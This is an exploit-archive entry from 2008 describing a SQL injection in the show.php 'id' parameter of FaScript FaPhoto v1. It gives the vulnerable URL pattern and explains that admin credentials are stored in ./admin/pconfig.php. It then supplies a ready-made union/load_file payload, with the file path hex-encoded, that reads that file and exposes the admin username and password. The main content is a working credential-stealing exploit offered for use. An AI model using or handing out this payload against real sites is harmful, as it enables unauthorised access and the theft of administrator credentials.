[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FaScript FaPhoto v1 (show.php id) SQL Injection Vulnerability
# Published : 2008-04-01
# Author : IRCRASH
# Previous Title : EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit
# Next Title : Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash) #
# #
#Script Download : http://en.fascript.com/en.faphoto.zip #
# #
#Injection Adress : http://Sitename/faname/show.php?id=<SqL Code> #
# #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php #
# You can open this file with load_file Function in mysql and see admin #
# Username and password in Page Source #
# #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 #
# #
#SQL Code for Read pconfig.php : 999999%27union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3,4,5,6/*
# #
# Our site : HTTP://IRCRASH.COM #
# #
# Tnx God #
#####################################################################################
# www.Syue.com [2008-04-01]